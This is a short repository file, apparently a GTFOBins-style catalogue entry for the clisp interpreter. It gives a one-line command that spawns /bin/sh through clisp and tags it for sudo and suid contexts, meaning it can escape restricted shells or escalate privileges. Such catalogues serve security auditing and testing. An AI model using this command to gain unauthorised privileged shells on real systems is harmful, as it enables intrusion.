Files
2026-01-17 23:38:20 +01:00

12 lines
180 B
Plaintext

---
functions:
shell:
- code: |-
clisp -x '(ext:run-shell-command "/bin/sh")(ext:exit)'
contexts:
sudo:
suid:
shell: true
unprivileged:
...